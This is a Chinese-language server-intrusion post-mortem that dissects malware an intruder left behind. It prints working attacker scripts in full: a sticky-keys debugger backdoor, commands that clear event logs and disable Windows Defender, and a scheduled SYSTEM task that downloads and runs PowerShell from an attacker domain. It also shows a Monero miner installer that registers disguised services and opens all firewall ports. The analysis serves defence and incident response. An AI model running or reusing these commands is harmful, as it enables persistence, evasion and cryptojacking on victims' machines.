2022年7月20日服务器入侵复盘

黑客遗留样本

黑客入侵电脑后，拷贝了几个脚本，分别为：后门程序和挖矿脚本
先看后门程序的内容，有3个文件，分别为1.bat 、1.reg 、sethc.exe

1、后门程序

1.bat内容如下：

@echo off
%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",1)(window.close)&&exit
cd /d "%~dp0"

reg import 1.reg
mkdir C:\PerfLogs\Admin
copy sethc.exe C:\PerfLogs\Admin\setup.exe
attrib C:\PerfLogs\Admin\setup.exe +h +a +s +r
del 1.reg
del sethc.exe
del 1.bat

解释：

@echo off
## 管理员运行本脚本
%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",1)(window.close)&&exit
cd /d "%~dp0"

## 导入本目录下的1.reg注册表
reg import 1.reg
## 创建文件夹
mkdir C:\PerfLogs\Admin
## 将本目录的exe文件拷贝到指定目录
copy sethc.exe C:\PerfLogs\Admin\setup.exe
## 给该文件添加隐藏权限
attrib C:\PerfLogs\Admin\setup.exe +h +a +s +r
## 删除文件
del 1.reg
del sethc.exe
del 1.bat

1.reg内容如下：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"debugger"="C:\\PerfLogs\\Admin\\setup.exe"

意思为：将setup.exe程序替换为粘滞键（微软自带的按5下shift出现的粘滞键）
而setup.exe文件里是个自解压的批处理文件

这个批处理文件已加密，当按5下shift后，可在任意解面调出粘滞键，而该程序已被篡改为批处理程序。该程序可无需密码调出cmd窗口。如果受害者发现自己电脑被攻击后，修改了密码，黑客仍然能直接修改其密码。

2、权限维持

挖矿病毒文件如下：

其中d.bat内容：

@echo off 
%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",1)(window.close)&&exit  
cd /d "%~dp0" 

## 清除入侵日志
wevtutil cl "System"
wevtutil cl "Application"
wevtutil cl "Security"
## 关闭微软自带杀毒软件
cmd.exe /c powershell -nop -w hidden -c "Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableRealtimeMonitoring $true; reg add \"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\" /v \"DisableAntiSpyware\" /d 1 /t REG_DWORD /f"
## 创建定时任务（定时任务的配置文件在线上，意味着可以随时修改内容对服务器进行攻击）
schtasks /create /F /sc minute /mo 60 /tn "WindowsUpdate" /tr "cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString(\\\`"http://k2ygoods.ydns.eu/config.txt\\\`")" /ru "system"

pause

下载上面的配置文件查看发现

$content = Get-Content "C:\Windows\debug\m\config.json" -Raw
## 判断本地挖矿的配置文件里没有指定内容
if (! $content.ToString().contains("k2yisgood.ydns.eu")  -or ! $content.ToString().contains("supportxmr")){

    attrib "C:\Windows\debug\m\config.json"  -h -a -s -r

    $client = new-object System.Net.WebClient
## 如果没有就从线上下载配置文件（防止挖矿失效）
$client.DownloadFile('http://k2ygoods.ydns.eu/config.json','C:\Windows\debug\m\config.json')

    attrib "C:\Windows\debug\m\config.json"  +h +a +s +r
## 否则，关闭远程桌面（给服务器关闭远程入口，防止其他黑客破坏）
}else{
                net user admins /del
                REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f
    echo "bbbbb"
}

3、挖矿病毒

挖矿病毒是个自解压程序，里面内容如下：

双击运行m.exe程序后，会自动运行n.vbs，n.vbs实际是不弹窗运行c1.bat，防止出现cmd窗口被发现。而c1.bat内容如下：

@echo off 

cd /d "%~dp0" 

set SERVICE_NAME1=Windows Updata
set SERVICE_NAME2=Windows Management

## 通过lsass.exe程序把挖矿病毒winlogon.exe注册为系统服务，名字为`Windows Updata`,`Windows Management`，非常隐蔽
lsass.exe install "%SERVICE_NAME1%" winlogon.exe
C:\Windows\regedit /s server.reg

mkdir C:\PerfLogs\Admin
copy lsass.exe C:\PerfLogs\Admin\1sass.exe
copy csrss.exe C:\PerfLogs\Admin\csrss.exe
C:\PerfLogs\Admin\1sass.exe install "%SERVICE_NAME2%" C:\PerfLogs\Admin\csrss.exe
C:\Windows\regedit /s server2.reg

del csrss.exe
## 运行服务
sc start "%SERVICE_NAME1%"
sc start "%SERVICE_NAME2%"
## 隐藏文件
attrib C:\Windows\debug\m +h +a
attrib C:\Windows\debug\m\*.json +h +a +s +r
attrib C:\Windows\debug\m\*.exe +h +a +s +r
attrib C:\PerfLogs\Admin\*.exe +h +a +s +r
## 放开本机防火墙的所有端口
netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow

del server.reg
del server2.reg
del C:\windows\debug\m.exe
del n.vbs
del c1.bat
exit

此时挖矿病毒就以系统名自动运行了。正常非常难以察觉

而且第二步里的定时任务也会每隔60分钟运行一次。如果配置文件被删了，会自动下载

通过其配置文件里的钱包地址查看挖矿速度2.1MH/S，每天可以挖0.3658 XMR，结合今日的门罗币价格，约为375元每天